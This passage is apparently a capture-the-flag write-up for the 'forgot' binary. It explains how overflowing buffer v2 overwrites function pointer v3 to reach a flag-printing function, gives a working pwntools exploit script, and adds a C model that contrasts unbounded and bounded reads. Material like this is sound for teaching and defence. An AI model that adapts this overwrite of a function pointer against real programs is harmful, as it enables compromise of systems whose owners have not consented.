Finally, the code calls a function whose address is computed from v3 as the base and v14 as the offset.
We then find that v2 can overflow, and that the overflow can overwrite v3.
So we overwrite v3 with the address of sub_80486CC (the function that outputs the flag).
What remains is making sure v14 does not change.
It is enough for the input to fail the first function's check outright.
'\x47' does not pass that check.
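```python
from pwn import *

# io=process('./forgot')
io=remote('111.198.29.45',41178)
io.sendline(b'fuck')               # first prompt: any short input
addr=0x80486CC                     # sub_80486CC, the function that outputs the flag
# 0x20 bytes of '\x47' fill v2 and fail the first check, so v14 stays unchanged;
# the next 4 bytes land on v3
payload=b'\x47'*(0x20)+p32(addr)
io.sendline(payload)
io.interactive()
# i am a pig
```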
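The root cause described above is an unbounded read into v2, which sits directly in front of the function pointer v3. The following C model is an added example, not code from the challenge binary: `struct frame`, `read_unbounded`, `read_bounded` and `pointer_intact` are hypothetical names, and the 0x20-byte gap between v2 and v3 is taken from the payload. It shows the same input corrupting the pointer under an unbounded read and leaving it intact under a length-limited one.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed model of the layout in the write-up: a 0x20-byte buffer (v2)
   directly followed by the first function pointer (v3). */
typedef int (*handler_t)(void);
static int expected_handler(void) { return 0; }

struct frame {
    char      v2[0x20];
    handler_t v3;
};

/* Behaves like an unbounded "%s" read: copies until the input ends and
   ignores sizeof(v2). Capped at the struct size so the demo stays defined. */
static void read_unbounded(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy((unsigned char *)f, in, n);
}

/* Hardened read: never writes past v2 and always NUL-terminates,
   the equivalent of a "%31s" width limit. */
static void read_bounded(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof f->v2 - 1) n = sizeof f->v2 - 1;
    memcpy(f->v2, in, n);
    f->v2[n] = '\0';
}

/* Returns 1 if v3 still holds the handler the program installed. */
static int pointer_intact(int bounded) {
    unsigned char in[sizeof(struct frame)];
    handler_t orig = expected_handler;
    struct frame f;
    memset(&f, 0, sizeof f);
    f.v3 = orig;
    memset(in, 0x47, sizeof in);   /* constructed input: filler bytes only */
    if (bounded) read_bounded(&f, in, sizeof in);
    else         read_unbounded(&f, in, sizeof in);
    return memcmp(&f.v3, &orig, sizeof orig) == 0;
}

int main(void) {
    printf("unbounded read: v3 intact = %d\n", pointer_intact(0));
    printf("bounded read:   v3 intact = %d\n", pointer_intact(1));
    return 0;
}
```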